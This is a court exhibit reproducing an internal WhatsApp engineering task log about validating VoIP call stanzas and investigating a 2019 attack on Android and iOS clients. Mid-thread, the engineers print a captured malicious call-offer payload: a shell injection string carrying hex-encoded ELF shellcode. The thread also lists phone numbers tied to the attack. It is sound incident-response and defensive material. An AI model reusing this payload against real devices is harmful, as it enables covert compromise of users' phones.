UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

Case #:   4:19-cv-07123-PJH

Plntf Exhibit No.   PTX-0013

Date Admitted:   _____

By:   _____

Kelly Collins, Deputy Clerk

10/21/2020                                 T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

T34775320                                                                                                    ⤷ Edit Mode

# [Follow-up] Server to validate call stanzas as defined in the protocol

👤 Jesus Barcons Palau          **Mid**        Private

Follow up on S164677. Client vulnerabilities could have been prevented by enforcing that stanzas are compliant with the protocol.

ODS counters:  https://fburl.com/ods/bwwvvmyg

| Public Title | Enter public task title |
| --- | --- |

| Subscribers | Aby John     Amol Godbole     ~~Andrey Labunets~~     ~~Brendon Tiszka~~     Carl Woog     Chris Bream     Chris Puntarelli     Chris Steipp     Claudiu Gheorghe     Cortney Padua |
| --- | --- |
| | Dan Gurfinkel     Despina Papageorge     Dhaval Kapil     ~~Doe Demko~~     Drew Robinson     Edward George     ~~Ehren Kret~~     ~~Elizabeth Schweinsberg~~     Elly Bingaman |
| | Hasan Eray Dogan     Henry Han     Ibrahim Mohamed     Jeremy Apple     Jessica Romero     Jessica Romero     Jesus Barcons Palau     ~~Jim O'Leary~~ |
| | Joaquin Moreno Garijo     John Altermueller     Kathy Zhang     Lauren Won     Manpreet Singh     Mark Hammell     Maxime Boucher     ~~Michael Kearney~~     Michael Scott |
| | Mikhail Vorontsov     Otto Ebeling     Patrick Jette     ~~Paul Otto~~     ~~Roger Shen~~     SEV Manager     Sundar Jeyaraman     Tiana Demas     Xi Deng     YuanYuan Wang     See less |

| Tags | Dashboards     SEV Task     security     whatsapp |
| --- | --- |

| Creator | Jesus Barcons Palau (October 4, 2018) |
| --- | --- |

| FBID | 472814263202094 (Copy Draft ID) |
| --- | --- |

| Schedule | **Start** mm/dd/yyyy    9:00 AM    **Target** mm/dd/yyyy    5:00 PM |
| --- | --- |

| Attachments | all_failed_20190506_1440.txt.gz |
| --- | --- |
| | all_malicious_other_stanzas_20190506.txt |
| | attacker_patch |
| | attacker_signaling_trace.log.zip |
| | logs2.zip |
| | relation_numbers.csv |
| | trace_log_3579e282384.html |
| | trace_log_legit_stanzas_16507147714.html |
| | whatsapp_2019.05.03.4.13.log |

https://www.internalfb.com/intern/tasks/?t=34775320

Highly Confidential - Attorneys' Eyes Only



EXHIBIT
1105

WA-NSO-00017583

PTX-0013.0001

whatsapp-2019-05-03_1.log
whatsapp-2019-05-07_1.log
whatsapp-consumer-debug.apk
whatsapp-consumer-debug.apk
whatsapp-consumer-debug_exploit_iOS_Android.apk

| Diffs | | |
|---|---|---|
| | D15332007 [chatd_e2e] Also log to Scuba VoIP stanzas that are sent by emulators. | Closed |
| | D15321226 [voip_validation] Promoting some stanza validation from ?IN_PROGRESS to ?CHECKED. | Closed |
| | D15306712 Also log to Scuba UUID of call offer that fails validation. | Closed |
| | D15264931 Logging IP of clients that fail VoIP stanza validation. | Closed |
| | D15256060 [voip_validation] Promote video and group call offers from in progress to checked. | Closed |
| | D15248456 [voip_validation] Add validation for relayelection and transport stanzas. | Closed |
| | D15215075 [voip_validation] Add validation for direct group call offers. | Closed |
| | D15214489 [voip_validation] Add validation for video stanza. | Closed |
| | D15214368 [voip_validation] Add validation for group call offer stanza. | Closed |
| | D15213279 [voip_validation] Add optional device attribute in offer stanza. | Closed |
| | D15196579 Dropping call stanzas that fail validation. | Closed |
| | D15144352 Fixed a couple of failures on offer and accept for stanza validation. | Closed |
| | D15117910 Stanza validation for 1:1 call accept. | Closed |
| | D15068446 [voip_validation] Validation for 1:1 call offer stanzas. | Closed |
| | D14694551 [chat/voip_validation] Cleaner spec definition. | Closed |
| | D14597360 [chatd/voip_validation] Add validation for one_rekey stanzas. | Closed |
| | D14433076 [chatd/voip_validation] First draft to perform validation of call stanzas. | Closed |
| | D14423162 [tests/mod_call] Added e2e test for relaylatency. | Closed |
| | See less | |

| Blocks | | |
|---|---|---|
| | T44191245 Master task for SEV-S178165 | |
| | T22485260 Security Review Request - WhatsApp client VoIP stack | |
| | T38964548 [Master] [WA] Whatsapp Hardening project | |

| Depends on | | |
|---|---|---|
| | T44089969 finish voip stanza validation | |
| | T44069331 Make sure we store data from scribe's edgeray_debug | |

| Plugin Suggestions | |
|---|---|
| | 6 plugin(s) have data available for this task. Click to activate them! |
| | • Automation Test Status |
| | • Flipper for Oculus Bug Reports |
| | • Product-Feature Hierarchy |
| | • SEV Manager |

Highly Confidential - Attorneys' Eyes Only                                          WA-NSO-00017584

PTX-0013.0002

- Oncall Predictions
- Gilbert (Log Viewer)

## Activity & Comments

**Jesus Barcons Palau** created this task.

October 4, 2018

    created the task

    changed the priority to    **None**

    subscribed Manpreet Singh, Claudiu Gheorghe, Jesus Barcons Palau and Ehren Kret

    changed the title to "Server to validate call stanzas as defined in the protocol"

    changed the description · View

**Hide all changes...**

**Otto Ebeling** subscribed Otto Ebeling and Ibrahim Mohamed

October 5, 2018

**Ibrahim Mohamed** made several changes

October 5, 2018

    changed the title from "Server to validate call stanzas as defined in the protocol" to "[Follow-up] Server to validate call stanzas as defined in the protocol"

    marked this task as blocking T22485260: Security Review Request - WhatsApp client VoIP stack

**Hide all changes...**

 **Otto Ebeling**

This is now even more relevant given that an external researcher found out a new way to inject voip_settings. See #33535414 / t37576393

It'd be a lot cleaner/safer to have the server enforce proper schema for all messages (and make sure clients don't send server-only messages etc.), as adding ad-hoc checks in the code is a bit of a  whack-a-mole game, and further protocol changes can introduce new risks.

Does the server always re-encode the whole protocol tree? The researcher was also considering an attack where she would try to find data would be interpreted as one tree by the server and as another by the client, but if the server re-encodes the whole tree into the binary format, this wouldn't work as a way to bypass server-side filtering.

December 4, 2018 · Like ·    1 · Reply

 **Otto Ebeling**

Claudiu Gheorghe could you help find who could work on this?

I think the process of doing this would also be useful in improving documentation as well as sharing knowledge between the client/server teams, as the protocol would need to be...

Highly Confidential - Attorneys' Eyes Only                                                                   WA-NSO-00017585

PTX-0013.0003

I think the process of doing this could also be useful in improving documentation as well as sharing knowledge between the client/server teams, as the protocol would need to be specified more formally.

December 4, 2018 · Like ·    1 · Reply

**Otto Ebeling** changed the priority from  **None**  to  **Mid**

December 4, 2018

**Jesus Barcons Palau** subscribed Maxime Boucher

December 5, 2018

 **Jesus Barcons Palau**

I will be the one driving this task.

Today I have brought awareness of the need for stanza validation during the weekly server tech talk, where I have explained the security issues and server side fixes -- thanks Otto Ebeling and Ibrahim Mohamed!  More teams within WhatsApp will likely engage with the PSAA team.

Maxime Boucher has explained me how they validate stanzas for Ads using a Thrift schema to generate Erlang records.  This would be a good fit for us.  Before starting, I would like for the entire server team to be onboard using the same way for validating client generated stanzas.  Maxime Boucher will give a talk mid January.  Meanwhile we can start experimenting with this approach.

December 5, 2018 · Like ·    2 · Reply

**Jesus Barcons Palau** made several changes
December 6, 2018
    claimed the task
    changed the progress to **Planned**
    subscribed Sundar Jeyaraman
**Hide all changes...**

**Ibrahim Mohamed** marked this task as blocking T38964548: [Master] [WA] Whatsapp Hardening project
January 10, 2019

**Jesus Barcons Palau** made several changes
March 12, 2019
    added D14423162: [tests/mod_call] Added e2e test for relaylatency.
    added D14433076: [chatd/voip_validation] First draft to perform validation of call stanzas.
**Hide all changes...**

**Jesus Barcons Palau** changed the progress from **Planned** to **In Progress**
March 22, 2019

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017586

PTX-0013.0004

10/21/2020                                     T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

**Jesus Barcons Palau** Currently chatd555.atn is validating relaylatency stanza.  No actions are taken, just bumping counters: https://fburl.com/ods/78jgr6mn

March 22, 2019 · Like · Reply

**Jesus Barcons Palau** subscribed Xi Deng

March 22, 2019

**Xi Deng** Try group call rekey for the next? The count in rekey is also affected by the pj_uint8_t issue in .58

March 22, 2019 · Like ·     1 · Reply

**Jesus Barcons Palau** added D14597360: [chatd/voip_validation] Add validation for enc_rekey stanzas.

March 25, 2019

**Jesus Barcons Palau** Xi Deng, canarying this diff in chatd555.atn, so far all good but we have very few samples:  https://fburl.com/ods/sumad728

March 25, 2019 · Like · Reply

**Xi Deng** Thanks, if we don't see any errors after some time. We can try .58 in house to test. Actually, I only checked the code but not actually test it to confirm rekey will have issue.

March 25, 2019 · Like · Reply

**Jesus Barcons Palau** We have very few samples, maybe it's just a matter of waiting :)

March 25, 2019 · Like ·     1 · Reply

**Jesus Barcons Palau** added D14694551: [chat/voip_validation] Cleaner spec definition.

March 29, 2019

**Otto Ebeling** Had a quick look at the diffs, exciting updates in this task :)

April 2, 2019 · Like · Reply

**Jesus Barcons Palau** I will add validation for another stanza today.

April 24, 2019 · Like ·     1 · Reply

**Otto Ebeling** One thought we had when discussing this with Ibrahim was that the fact that the schema is in Erlang may make it harder to understand for folks not that familiar with Erlang, and some other schema/configuration format could be easier to understand. What are your thoughts on this?

April 24, 2019 · Like · Reply

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                                5/22

Highly Confidential - Attorneys' Eyes Only                                                   WA-NSO-00017587

PTX-0013.0005

10/21/2020                                   T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

**Jesus Barcons Palau** added D15068446: [voip_validation] Validation for 1:1 call offer stanzas.

April 24, 2019

 **Jesus Barcons Palau**

Thanks for bringing this up Otto Ebeling!  I considered creating a DSL but decided to go for Erlang directly after realizing that it didn't look bad at all --I'm obviously biased, but it's quite compact and nice the way to express stanza requirements:

```
#xl{name = '#relaylatency',
        attrs = #{
            '#call-id' => {?STRING, ?REQUIRED},
            '#call-creator' => {?WID, ?OPTIONAL},
            '#transaction-id' => {?INT_32, ?OPTIONAL}
        },
        els = [
                {#xl{name = '#te',
                    attrs = #{
                        '#latency' => {?INT_32, ?REQUIRED},
                        '#priority' => {?UINT_8, ?OPTIONAL}
                    },
                    els = ?IP_ADDRESS
                },
                {?REPEAT, 1, 8}}
            ]
    }
```

We can create a DSL and a DSL parser to convert to Erlang terms later on and reuse the validation engine of `voip_validation`. Thanks! :)

April 24, 2019 · Like ·    1 · Reply

 **Jesus Barcons Palau**

Canarying stanza validation in chatd555.atn, some validations failed:

https://phabricator.intern.facebook.com/P62862739

Highly Confidential - Attorneys' Eyes Only                                                              WA-NSO-00017588

PTX-0013.0006

I have noticed "resume" in the offer, I haven't seen this in the spec.

https://fburl.com/ods/kktmwkvf

April 24, 2019 · Like ·   1 · Reply

**Jesus Barcons Palau** subscribed YuanYuan Wang
April 25, 2019



**Jesus Barcons Palau**
Some more stanzas that fail validation:

https://phabricator.intern.facebook.com/P62869110
https://phabricator.intern.facebook.com/P62869468

YuanYuan Wang, I have noticed that:

- Some offers don't have elements 'enc' and 'enc_opt', is this expected?  I thought that the encryption material must be present in the call offer...

April 25, 2019 · Like · Reply

**Jesus Barcons Palau** made several changes
April 28, 2019
   added D15117910: Stanza validation for 1:1 call accept.
   changed the description · View
**Hide all changes...**



**Jesus Barcons Palau**
Some failed stanzas for accept and offer: https://phabricator.intern.facebook.com/P63226851

For accept what seems to be missing is:

   {'#peer-device',"web"}

For offer I have to take a closer look.  Will send diff shortly.

April 29, 2019 · Like · Reply



Highly Confidential - Attorneys' Eyes Only    WA-NSO-00017589

PTX-0013.0007

**Jesus Barcons Palau** Alright, the issue with other stanzas is that "dec" attribute name is not in the atom table. I will make sure the module loads first so atoms are present and used by the c2s parser.

April 29, 2019 · Like ·    1 · Reply

**Jesus Barcons Palau** added D15144352: Fixed a couple of failures on offer and accept for stanza validation.

April 29, 2019

**Jesus Barcons Palau**

Seeing failures in relaylatency stanzas:  https://phabricator.intern.facebook.com/P63530004

I have to investigate further, but it seems that some clients are not sending call-creator as a wid or wid-string.

(cc YuanYuan Wang)

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** Surprisingly the two clients in the paste are from  REDACTED

May 2, 2019 · Like · Reply

**Xi Deng** for creator jid. maybe an issue on iPhone-2.18.80 ? the both peer numbers in log are both iPhone-2.18.80  Roger Shen Kathy Zhang do you recall we send creator with only number ? (I assume Jesus Barcons Palau is complaining about this)

May 2, 2019 · Like · Reply

**Jesus Barcons Palau**

Some more logs:  https://phabricator.intern.facebook.com/P63532452

Another one from  REDACTED the other ones have call-creator as an empty string and completely messed up attributes.

May 2, 2019 · Like · Reply

**Xi Deng** Jesus Barcons Palau just fyi, I'm doing the cross platform xml signaling on client side, feel free to ping me on any stanza issues.

May 2, 2019 · Like · Reply

**Xi Deng** empty ones come from 2,18,327? maybe the fake client. What about only valid some recent clients, e.g. 2.19 only? for old clients, it may be fixed issues or may be hard to find the code to verify.

May 2, 2019 · Like · Reply

**Xi Deng** for non empty one in the latest paste, the creator is also on 2.18.80 (iphone)

Highly Confidential - Attorneys' Eyes Only                                                                                              WA-NSO-00017590

PTX-0013.0008

**Xi Deng** for non empty one in the latest paste, the creator is also on 2.16.80 (iphone)

May 2, 2019 · Like · Reply

**Kathy Zhang** Xi Deng The call creator jid in relay latency stanza( outgoing) is filled by the call creator jid in call ctx in voip stack like all the other stanzas.

May 2, 2019 · Like · Reply

**Roger Shen** Hey Xi Deng, I don't recall we send number only for call creator. Voip Stack gives app JID string and we put it into the stanza.

May 2, 2019 · Like · Reply

**Roger Shen** Do we have report on newer client? Agree with Xi that we moved stanza handling a lot recently and investigating older client issues won't help much

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** This is success vs failed stanzas:  https://fburl.com/ods/zz9ue6mq

It's been going on for more than a month... Numbers are not increasing.  Rogue clients maybe?

May 2, 2019 · Like · Reply

**Xi Deng** does iphone 2.18.80 send creator jid in offer? we can try a call between 2.19.53 (android) and 2.18.80 (iphone) to see what's going on.

May 2, 2019 · Like · Reply

**Jesus Barcons Palau**
Found this call offer, worth taking a look:

https://phabricator.intern.facebook.com/P63566079

Looked at user account, this is the registered device:

    device_name:       samsung-VMware_Virtual_Platform

(cc Otto Ebeling, Ibrahim Mohamed)

May 2, 2019 · Like · Reply · Edited

**Ibrahim Mohamed**
There is this string

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017591

PTX-0013.0009

```
"=com.whatsapp;t=/data/data/$w/files/t;e=echo;c=\"chmod 777\";g=grep;v=/system/bin/am;u=$(which id>/dev/null && $e
$((`id | $g -oE \"uid=[0-9]+\" | $g -oE \"[0-9]+\"` / 100000)) || $e 0);cp $v ${t}p;s=\"stopservice --user $u
$w/.voipcalling.VoiceFGService;\";$v $s || ${t}p $s;rm ${t}*;$e -en
\"\\x7fELF\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x02\\x00\\x28\\x00\\x20\\x00\\x20\\x00\\x20\\x00\\x00
\\x20\\x00\\x04\\x00\\x00\\x19q\\x00\\xe3\\x00\\x20\\xb0\\xe34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x12\\xc0\\x8f\\x
e2\\x01\\xc0\\x8c\\xe2\\x1c\\xff\\x2f\\xe1iF0\\x00\\x00\\xdf\\x01D\\x12\\x1a\\xfa\\x1d1pG\\x02\\x20\\x01\\x21\\x00\\xdf\\
x06\\x00\\x027\\x0f\\xf20\\x01\\x10\\x22\\x00\\xdf\\x04\\x270\\x00\\x081\\x00\\xdf\\x20\\xb4\\x04\\x22\\x03\\x27\\xff\\x
f7\\xe7\\xff\\x04\\xbc\\x15\\x00\\xad\\xeb\\x02\\x0d\\xff\\xf7\\xe1\\xff\\x04\\x27\\x01\\x26\\x2a\\x00\\xff\\xf7\\xdc\\x
ff\\x01\\x27\\x00\\xdf\\x02\\x00\\xff\\x01\\xb9\\xelEhX0Xu${t}z\\x00\">$t;$c $t;$t>${t}z;$c ${t}z;${t}z 6845e1b9
00001f93 fb55352a 3345d6f0;rm ${t}*;)&%0%0%0%0%0
```

Not sure if that is testing or a real exploit!!

May 2, 2019 · Like ·     1 · Reply

**Ibrahim Mohamed** searching for where `connecting_tone_desc` is used! seems to be a command injection bug if it is valid

May 2, 2019 · Like · Reply

**Ibrahim Mohamed** Jesus Barcons Palau is this being sent to Android or iOS? from the the string seems targeting Android?

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** Android-2.19.115

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** I can pull logs from the target phone.

May 2, 2019 · Like ·     1 · Reply

**Ibrahim Mohamed** Jesus Barcons Palau that will help in understanding what's going on. I am also trying to check the Android code for callsite of this field

May 2, 2019 · Like ·     1 · Reply

**Jesus Barcons Palau** Do you recommend to try to pull logs from the caller? I'm hesitant since it may reveal that we are looking at them... But I could trace all messages on server side if it's useful.

May 2, 2019 · Like ·     1 · Reply

**Ibrahim Mohamed** Nope, let's keep the caller as is. I Do not think the caller has a proper WA client anyway.

Highly Confidential - Attorneys' Eyes Only                                                          WA-NSO-00017592

PTX-0013.0010

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

May 2, 2019 · Like · Reply

 **Jesus Barcons Palau**
Another one looking the same:  https://phabricator.intern.facebook.com/P63568381

Different caller and target.  Target platform Android-2.19.115.

May 2, 2019 · Like · Reply · Edited

 **Jesus Barcons Palau** I have been able to pull logs from the second target, please find them attached in the task.

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** made several changes
May 2, 2019

    added attachment    whatsapp-2019-05-03.1....

    subscribed Mikhail Vorontsov

**Hide all changes...**

 **Jesus Barcons Palau**
These are all the failed stanzas (using the new validation method) for the past hour:  https://phabricator.intern.facebook.com/P63576490

I can send a change in next chatd deploy to drop failed stanzas.

May 2, 2019 · Like · Reply

**Henry Han** added attachment    whatsapp-consumer-debug....
May 2, 2019

 **YuanYuan Wang** Henry just uploaded a apk which has the attacker's patch, it will send the call offer with options.tone_description

May 2, 2019 · Like ·    1 · Reply

 **YuanYuan Wang** Please check if the attack is related to the print function we used for the voip settings, we print all the voip options we get from server when the call offer is received

May 2, 2019 · Like · Reply

 **YuanYuan Wang** Upload another APK which could make the receiver side print out the same log as the target device pasted here.

https://www.internalfb.com/intern/tasks/?t=34775320                                                                11/22

Highly Confidential - Attorneys' Eyes Only                                        WA-NSO-00017593

PTX-0013.0011

May 2, 2019 · Like · Reply

**YuanYuan Wang** made several changes
May 2, 2019

    added attachment    whatsapp-consumer-debug.…

    added attachment    attacker.patch

**Hide all changes...**

**YuanYuan Wang** adding the patch on Android code base to start the attack on caller side

May 2, 2019 · Like · Reply

**Claudiu Gheorghe** what's the effect when sending this?

May 2, 2019 · Like · Reply

**Jesus Barcons Palau** added D15196579: Dropping call stanzas that fail validation.
May 3, 2019

**Jesus Barcons Palau** I have a diff out for review to drop failed stanzas:  D15196579

May 3, 2019 · Like · Reply

**Xi Deng** added attachment    whatsapp-2019-05-03.1 (2).…
May 3, 2019

**Xi Deng**

Otto Ebeling the log with (2) has stack trace for the crash for this one (the same user as Jesus's log, but a little earlier)

    16:16:58  Android / Crash    2.19.115  samsung-SM-G960F    8.0.0    +973 3670 0200 [CS]    Bahrain    whatsapp-2019-05-03.1.log.gz [txt] 5.01 MB    native

Exception

Method

Location

State

libwhatsapp.so:SIGSEGV

build_stun_req(transport_p2p*, relay_cfg_ctx const*, unsigned char*, unsigned long, unsigned short, int)

wa_transport.cc:3250

Open

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017594

PTX-0013.0012

May 3, 2019 · Like · Reply

**Jesus Barcons Palau** added attachment    trace_log_35796282384.h...
May 4, 2019


**Jesus Barcons Palau**
Adding server trace logs for 35796282384, sending the malicious stanza.

May 4, 2019 · Like · Reply

**Jesus Barcons Palau** All invalid stanzas since May 4 at midnight, 75 with the malicious payload: https://phabricator.intern.facebook.com/P63705283

May 4, 2019 · Like · Reply

**Jesus Barcons Palau**
Adding for reference a server trace for how legit call stanzas look like. They have been sent from my work phone to my personal phone. There is a voice call and then a video call. In both cases I don't pick up the call but instead I hang up from the caller device.

May 4, 2019 · Like · Reply

**Jesus Barcons Palau** made several changes
May 4, 2019

    added attachment    trace_log_legit_stanzas_16507147714 ....

    added D15213279: [voip_validation] Add optional device attribute in offer stanza.

**Hide all changes...**

**Andrey Labunets** made several changes
May 4, 2019

    subscribed Andrey Labunets and Elizabeth Schweinsberg

    added allowed viewer Subscribers

**Hide all changes...**

**Jesus Barcons Palau** made several changes
May 5, 2019

    added D15214368: [voip_validation] Add validation for group call offer stanzas.

    added D15214489: [voip_validation] Add validation for video stanza.

Highly Confidential - Attorneys' Eyes Only                                                                WA-NSO-00017595

PTX-0013.0013

added D15215075: [voip_validation] Add validation for direct group call offers.

Hide all changes...

 **Jesus Barcons Palau** All failed stanza validations since today at midnight: https://phabricator.intern.facebook.com/P63727422

May 5, 2019 · Like · Reply

**Jesus Barcons Palau** added attachment      all_malicious_offer_stanzas_2019050…

May 6, 2019

**Jesus Barcons Palau**

Adding all the malicious offer stanzas since we started logging them (in file all_malicious_offer_stanzas_20190506.txt).

Total number: 1568

Source:

```
erlpssh.sh 'priv_atn/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt
  erlpssh.sh 'priv_atn/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt
  erlpssh.sh 'priv_atn/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt

  erlpssh.sh 'priv_frc/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt
  erlpssh.sh 'priv_frc/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt
  erlpssh.sh 'priv_frc/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -B 20 -A 8 "system\/bin\/am"' >>
/tmp/all_malicious_offer_stanzas_20190506.txt
```

May 6, 2019 · Like · Reply

**Jesus Barcons Palau** added attachment      relation_numbers.csv

May 6, 2019

 **Jesus Barcons Palau**

Highly Confidential - Attorneys' Eyes Only                                                            WA-NSO-00017596

PTX-0013.0014

Adding list of attacker to victim (excluding our test numbers used to repro the issue) --filename `relation_numbers.csv`.

May 6, 2019 · Like · Reply

**Andrey Labunets** did an action of type: InternActivityTaskAddParentTasks.

May 6, 2019

**Andrey Labunets** marked this task as depending on T44020385: crashlog: find similar crashes from S178165 in the past

May 6, 2019

**Andrey Labunets** marked this task as depending on T44019656: log all the large RTCP packets in edgeray

May 6, 2019

**Claudiu Gheorghe** Jesus - do you want to use this task for tracking the validation for the rest of the VOIP stanzas? As we discussed with Nitin, we want to have that done, to see if they are able to exploit other paths

May 6, 2019 · Like · Reply

**Jesus Barcons Palau** Claudiu Gheorghe, I was planning to continue using this task for it. I sent 3 diffs during the weekend that validate group call offers (v1 and v2) and video stanzas --currently on code review. Next stanza to validate is transport, then I will get the rest.

May 6, 2019 · Like ·    1 · Reply

**Jesus Barcons Palau**

To clarify, recent files 'all_malicious_offer_stanzas_20199596.txt' and 'relation_numbers.csv' contain stanzas and phone numbers for the payload with substring **system/bin/am**.

YuanYuan Wang pointed out that there are other bad stanzas, they contain the substring **delay_based_bwe_trendline_filter_enabled**. Should we get to them later or start tracking them as well?

May 6, 2019 · Like · Reply

**YuanYuan Wang** added attachment        attacker_signaling_trace.log....

May 6, 2019

**YuanYuan Wang**

May 6, 2019 · Like ·    1 · Reply

**Jesus Barcons Palau** added attachment        all_failed_20190506_1440.tx...

May 6, 2019

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017597

PTX-0013.0015

10/21/2020        T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

 **Jesus Barcons Palau**
Attaching *all* the failed stanzas seen by chatd so far.  Commands used to fetch them:

```
erlpssh.sh 'priv_atn/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza validation"'
>> /tmp/all_failed_20190506_1414.txt
erlpssh.sh 'priv_atn/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt
erlpssh.sh 'priv_atn/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt

erlpssh.sh 'priv_frc/whatsapp/chatd/{0..400}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza validation"'
>> /tmp/all_failed_20190506_1414.txt
erlpssh.sh 'priv_frc/whatsapp/chatd/{401..800}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt
erlpssh.sh 'priv_frc/whatsapp/chatd/{801..1200}' 'less chatd/log/chatd.log* | grep -A 40 "Failed VoIP stanza
validation"' >> /tmp/all_failed_20190506_1414.txt
```

May 6, 2019 · Like · Reply

 **Ibrahim Mohamed** Just confirmed that the same potential bug works on WhatsApp iOS. Tested on App store version 2.19.42
The patched (attacker's WA) is attached

May 6, 2019 · Like ·     3 · Reply

**YuanYuan Wang** marked this task as depending on T44019169: log all the packets from particular JIDs for investigation
May 6, 2019

**Ibrahim Mohamed** added attachment     whatsapp-consumer-debug_exploit_iOS_Androi...
May 6, 2019

**Claudiu Gheorghe** added tags  whatsapp  ,  Dashboards  ,  security
May 7, 2019

 **Claudiu Gheorghe**
(posting for tomorrow, no need to reply now)

https://www.internalfb.com/intern/tasks/?t=34775320      16/22

Highly Confidential - Attorneys' Eyes Only     WA-NSO-00017598

PTX-0013.0016

Jesus - we should start pushing out the Erlang changes and gate them behind a server knob (WGC, waknob, etc.), so that when we're ready we can enable the validation code in realtime.

- let's flesh out what how many of these stanzas are validated and how many are left; we can get more folks to help with that to parallelize the effort

May 7, 2019 · Like · Reply · Edited

 **Jesus Barcons Palau**  Sounds good, I will make changes to that diff so we can gate it behind a WGC variable.  Thanks!

May 7, 2019 · Like ·    1 · Reply

**Andrey Labunets** marked this task as depending on T44069331: Make sure we store data from scribe's edgeray_debug

May 7, 2019

Hasan Eray Dogan, Dan Gurfinkel, Mark Hammell and 21 more people were subscribed

May 7, 2019

Load more changes

    **Andrey Labunets** subscribed Brendon Tiszka

    **Joaquin Moreno Garijo** subscribed Jessica Romero and Drew Robinson

    **Jesus Barcons Palau** subscribed Jessica Romero

    **Joaquin Moreno Garijo** subscribed Tiana Demas

    **Jesus Barcons Palau** subscribed Despina Papageorge

    **Andrey Labunets** subscribed Jeremy Apple

    **Andrey Labunets** subscribed Aby John

    **Cortney Padua** subscribed Mark Hammell and Michael Scott

    **Ibrahim Mohamed** subscribed Dan Gurfinkel

    **Andrey Labunets** subscribed Hasan Eray Dogan

Hide all changes...

**Xi Deng** added attachment        logs2.zip

May 7, 2019

 **Xi Deng**

Attached logs logs2.zip which show "voicefgservice/onDestroy" after malicious connecting_tone without crash between. These may be poential success exploits.

May 7, 2019 · Like ·    1 · Reply · Edited

 **Xi Deng**

Highly Confidential - Attorneys' Eyes Only                                                                                          WA-NSO-00017599

PTX-0013.0017

some are destroyed because peer rejects or accepts. Only 05/07's could be exploits. However, 05/07 may be their tests. All numbers are

6281293395095

6281380912612

6281380912613

6285215659697

6287771258524

May 7, 2019 · Like · Reply · Edited

**Jesus Barcons Palau** made several changes

May 7, 2019

    marked this task as depending on T44020654: collect all the numbers affected by S178165

    added D15248456: [voip_validation] Add validation for relayelection and transport stanzas.

    subscribed John Altenmueller

Hide all changes...

**John Altenmueller** marked this task as depending on T44089969: finish voip stanza validation

May 7, 2019

 **YuanYuan Wang** Xi Deng voicefgservice/onDestroy() is also called at the end of the call, and if it's stopped by us, we would see "voicefgservice/stop-service", and "voicefgservice/onStartCommand:Intent { act=com.whatsapp.service.VoiceFgService.STOP cmp=com.whatsapp/.voipcalling.VoiceFGService (has extras) }" in the log, we would not see this log if the the service is stopped the the shell command

May 7, 2019 · Like · Reply

    **Xi Deng**

    yes, None of voipfgservice onDestroy in crash logs are stopped by shell code. (They are triggered either by user accepts, rejects, camera errors or attacker terminates).

    However, this doesn't prove that user is not exploited as my latest comment in workchat.

    *Their shellcode could have an bug. It only works here when I replace*

    *s="stopservice --user $u $w/.voipcailng.VoiceFGService;"*

    *with*

    *s="stopservice –user $u $w/.voipcalling.VoiceFGService"*

    *So there might not be "voicefgservice/onDestory" log when exploit is success.*

    May 7, 2019 · Like ·    1 · Reply · Edited

**Jesus Barcons Palau** added D15256060: [voip_validation] Promote video and group call offers from in-progress to checked.

May 7, 2019

Highly Confidential - Attorneys' Eyes Only    WA-NSO-00017600

PTX-0013.0018

 **YuanYuan Wang**

Xi, can you try to execute the shell command in java code

"w=com.whatsapp;t=/data/data/$w/fil:s/t;c=echo;c=\"chmod 777\";g=grep;v=/system/bin/am;u=$(which id>/dev/null && $c $(`id | $g -oE \"uid=[0-9]+\" | $g -oE \"[0-9]+\"` / 100000)) || $e 0);cp $v ${t}p;s=\"stopservice --user $u $w/.voipcalling.VoiceFGService;\""

if it can generate the error log of "java.lang.SecurityException: Permission Denial: getCurrentUser() from pid=6533, uid=10198 requires android.permission.INTERACT_ACROSS_USERS", then maybe this is the indicator of successful attack in the log.

May 8, 2019 · Like · Reply · Edited

**Jesus Barcons Palau** added D15264931: Logging IP of clients that fail VoIP stanza validation.

May 8, 2019

**Aby John** marked this task as blocking T44191245: Master task for SEV S178165

May 9, 2019

**Aby John** marked this task as not blocking T44191245: Master task for SEV S178165

May 9, 2019

